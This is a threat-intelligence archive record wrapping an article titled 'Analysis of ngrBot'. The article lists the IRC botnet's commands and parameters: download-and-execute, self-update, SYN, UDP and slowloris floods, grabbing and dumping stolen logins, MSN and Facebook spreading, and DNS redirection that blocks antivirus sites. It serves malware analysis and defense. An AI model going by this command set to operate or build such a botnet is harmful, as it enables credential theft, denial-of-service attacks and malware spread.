{
	"id": "ccf91557-8f3c-4af5-b322-c6632a4cc96e",
	"created_at": "2026-04-06T00:15:36.476484Z",
	"updated_at": "2026-04-10T13:13:00.075452Z",
	"deleted_at": null,
	"sha1_hash": "cc20a9757b0a67efa65c556c554fe6eda6cb74c3",
	"title": "Analysis of ngrBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 170592,
	"plain_text": "Analysis of ngrBot\r\nBy Kimberly\r\nArchived: 2026-04-05 20:39:51 UTC\r\n000. Note: parameters within \"[\" and \"]\" are required, and parameters within \"\u003c\" and \"\u003e\" are\r\noptional.\r\n001.  \r\n002.!dl [url] \u003cmd5\u003e \u003c-r\u003e \u003c-n\u003e\r\n003.  \r\n004.The bot downloads and executes a file from the specified URL.\r\n005.  \r\n006.Parameters\r\n007.url URL of the file to download and execute\r\n008.md5 optional MD5 hash of the file to download for integrity check, the bot will\r\nnot redownload a file with the same hash until reboot\r\n009.-r Enable RusKill on downloaded file\r\n010.-n Disables PDef+ on the system until reboot or until it is manually re-enabled\r\n011.  \r\n012. -------------------------\r\n013. \r\n014.!up [url] [md5] \u003c-r\u003e\r\n015.  \r\n016.The bot updates its file, but the update does not take effect until the system is\r\nrestarted.\r\n017.  \r\n018.Parameters\r\n019.url URL of the file to update to\r\nhttp://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nPage 1 of 10\n\n020.\r\nmd5MD5 hash of the update file\r\n021.-rReboot immediately\r\n022. \r\n023. -------------------------\r\n024. \r\n025.!die\r\n026.  \r\n027.The bot disconnects from the IRC server and does not reconnect until its system reboots.\r\n028.  \r\n029. -------------------------\r\n030. \r\n031.!rm\r\n032.  \r\n033.The bot will remove itself from the system.\r\n034.  \r\n035. -------------------------\r\n036. \r\n037.!m [state]\r\n038.  \r\n039.Enable/disable all output to IRC regarding to commands and features.\r\n040.  \r\n041.Parameters\r\n042.state Enable (on) or disable (off) muting of all output to IRC\r\n043.  \r\n044. -------------------------\r\n045. \r\nhttp://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nPage 2 of 10\n\n046.\r\n!v\r\n047.  \r\n048.The bot displays its version, customer name, the MD5 hash of its file, and its installed\r\nfilepath.\r\n049.  \r\n050. -------------------------\r\n051. \r\n052.!vs [url] [state]\r\n053.  \r\n054.The bot creates a browser instance and visits the specified link.\r\n055.  \r\n056.Parameters\r\n057.url URL to open\r\n058.state Open in a visible (1) or invisible (0) window\r\n059.  \r\n060. -------------------------\r\n061. \r\n062.!rc \u003c-n|-g\u003e\r\n063.  \r\n064.The bot disconnects from the IRC server and waits 15 seconds before reconnecting.\r\n065.  \r\n066.Parameters\r\n067.-n Only reconnect if the bot is currently marked as \"new\"\r\n068.-g Only reconnect if the bot did not previously succeed in determining its country\r\nusing GeoIP\r\n069.  \r\n070. -------------------------\r\nhttp://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nPage 3 of 10\n\n071.\r\n \r\n072.!j [\u003c[rule] [options]\u003e channel] \u003ckey\u003e\r\n073.  \r\n074.The bot joins the specified channel. If rules are specified, the bot will only join if\r\nthe rules apply to it.\r\n075.  \r\n076.Parameters\r\n077.rule Optional rule for the bot to check for. Supported options are -c (country)\r\nand -v (version)\r\n078.options Options for selected rule\r\n079.With -c, you can put a single or multiple comma-separated country code(s)\r\n080.With -v, you can put a single or multiple comma-separated version(s)\r\n081.channel Channel to join\r\n082.key Key of channel to join\r\n083.  \r\n084. -------------------------\r\n085. \r\n086.!p [\u003c[rule] [options]\u003e channel]\r\n087.  \r\n088.The bot parts the specified channel.\r\n089.  \r\n090.Parameters\r\n091.rule Optional rule for the bot to check for. Supported options are -c (country)\r\nand -v (version)\r\n092.options Options for selected rule\r\n093.With -c, you can put a single or multiple comma-separated country code(s)\r\n094.With -v, you can put a single or multiple comma-separated version(s)\r\nhttp://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nPage 4 of 10\n\n095.\r\nchannelChannel to part\r\n096.  \r\n097. -------------------------\r\n098.  \r\n099.!s \u003crule\u003e\r\n100.  \r\n101.The bot joins the channel for its country (e.g. Russian bots (RU) join #RU).\r\n102.  \r\n103.Parameters\r\n104.rule Optional rule for the bot to sort by instead of country. Supported options are -o\r\n(operating system), -n (new/old), -u (admin/user), and -v (version)\r\n105.  \r\n106. -------------------------\r\n107. \r\n108.!us \u003crule\u003e\r\n109.  \r\n110.The bot parts the channel for its country (e.g. Russian bots (RU) part #RU).\r\n111.  \r\n112.Parameters\r\n113.rule Optional rule for the bot to unsort by instead of country. Supported options are\r\n-o (operating system), -n (new/old), -u (admin/user), and -v (version)\r\n114.  \r\n115. -------------------------\r\n116. \r\n117.!mod [module] [state]\r\n118.  \r\n119.Enable/disable modules that use hooks.\r\nhttp://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nPage 5 of 10\n\n120.\r\nNote: disabling bdns will only unblock AV and other preset sites, not sites set using\r\nthe !mdns command.\r\n121.  \r\n122.Parameters\r\n123.module Module to change. Supported modules: msn, msnu, pdef, iegrab, ffgrab,\r\nftpgrab, bdns, usbi\r\n124.state Enable (on) or disable (off) module\r\n125. \r\n126. -------------------------\r\n127. \r\n128.!stats \u003c-l|-s\u003e\r\n129.  \r\n130.Retrieves statistics for spreading and/or login grabbing. If no parameters are specified,\r\nit will display both.\r\n131.  \r\n132.Parameters\r\n133.-l Display login grabber stats\r\n134.-s Display spreading stats\r\n135.  \r\n136. -------------------------\r\n137. \r\n138.!logins \u003csite|-c\u003e\r\n139.  \r\n140.Retrieves all grabbed and cached logins and prints them to channel or PM. Can also be\r\nused to clear login cache.\r\n141.  \r\n142.Parameters\r\n143.site Site to retrieve logins for (case insensitive, see here for the list of sites)\r\nhttp://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nPage 6 of 10\n\n144.\r\n-cClear login cache\r\n145.  \r\n146. -------------------------\r\n147. \r\n148.!stop\r\n149.  \r\n150.The bot will end all running flood tasks.\r\n151.  \r\n152. -------------------------\r\n153. \r\n154.!ssyn [host] [port] [seconds]\r\n155.  \r\n156.Parameters\r\n157.host Host to flood with SYN requests\r\n158.port Port to flood. If 0, the bot uses a random port\r\n159.seconds Number of seconds to flood the target\r\n160.  \r\n161. -------------------------\r\n162. \r\n163.!udp [host] [port] [seconds]\r\n164.  \r\n165.Parameters\r\n166.host Host to flood with UDP packets\r\n167.port Port to flood. If 0, the bot uses a random port\r\n168.seconds Number of seconds to flood the target\r\n169.  \r\nhttp://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nPage 7 of 10\n\n170. -------------------------\r\n171. \r\n172.!slow [host] [minutes]\r\n173.  \r\n174.Parameters\r\n175.host Host to flood using slowloris\r\n176.minutes Number of minutes to flood the target\r\n177.  \r\n178. -------------------------\r\n179. \r\n180.!msn.int [interval]\r\n181.  \r\n182.Set the number of MSN messages in a conversation before one is changed with your\r\nspreading message. See here for more information.\r\n183.Note: use '#' for a random interval between 1 and 9.\r\n184.  \r\n185.Parameters\r\n186.interval Number of MSN messages before spread\r\n187.  \r\n188. -------------------------\r\n189. \r\n190.!msn.set [message]\r\n191.  \r\n192.Set the message that will be used for MSN spreading. See here for more information.\r\n193.Note: use '#' for a random digit and '*' for a random lowercase letter.\r\n194.  \r\n195.Parameters\r\nhttp://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nPage 8 of 10\n\n196.\r\nmessageMessage to spread via MSN\r\n197.  \r\n198. -------------------------\r\n199.  \r\n200. !http.int [interval]\r\n201.  \r\n202.Set the number of Facebook messages in a conversation before one is changed with your\r\nspreading message. See here for more information.\r\n203.Note: use '#' for a random interval between 1 and 9.\r\n204.  \r\n205.Parameters\r\n206.interval Number of Facebook messages before spread\r\n207.  \r\n208. -------------------------\r\n209.  \r\n210.!http.set [message]\r\n211.  \r\n212.Set the message that will be used for Facebook spreading. See here for more information.\r\n213.Note: use '#' for a random digit and '*' for a random lowercase letter.\r\n214.  \r\n215.Parameters\r\n216.message Message to spread via Facebook\r\n217.  \r\n218. -------------------------\r\n219. \r\n220.!mdns [url|[domain1 \u003cdomain2|ip2\u003e]|[ip1 \u003cip2\u003e]]\r\n221.  \r\nhttp://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nPage 9 of 10\n\n222.\r\nThe bot will block access to or redirect the specified domain/IP address.\r\n223.Note: domain to domain, domain to IP address, and IP address to IP address redirects\r\nwork. IP address to domain redirection does not yet work.\r\n224.Note: it must be the exact domain, for example \"example.com\" will not include\r\n\"www.example.com\". Wildcard support will be added in an update.\r\n225.  \r\n226.Parameters\r\n227.url Plaintext file with one redirect/blocking rule per line, rules are\r\nformatted in the same way as the command parameters.\r\n228.domain1 Requests for this domain will be redirected to domain2 or ip2 if they are\r\nset, otherwise it is blocked\r\n229.ip1 Requests for this IP address will be redirected to ip2 if it is set,\r\notherwise it is blocked\r\n230.domain2 DNS queries for domain1 will be redirected to this domain if set\r\n231.ip2 DNS queries for ip1 or domain1 will be redirected to this IP address if\r\nset\r\nSource: http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nhttp://stopmalvertising.com/rootkits/analysis-of-ngrbot.html\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html"
	],
	"report_names": [
		"analysis-of-ngrbot.html"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434536,
	"ts_updated_at": 1775826780,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cc20a9757b0a67efa65c556c554fe6eda6cb74c3.pdf",
		"text": "https://archive.orkl.eu/cc20a9757b0a67efa65c556c554fe6eda6cb74c3.txt",
		"img": "https://archive.orkl.eu/cc20a9757b0a67efa65c556c554fe6eda6cb74c3.jpg"
	}
}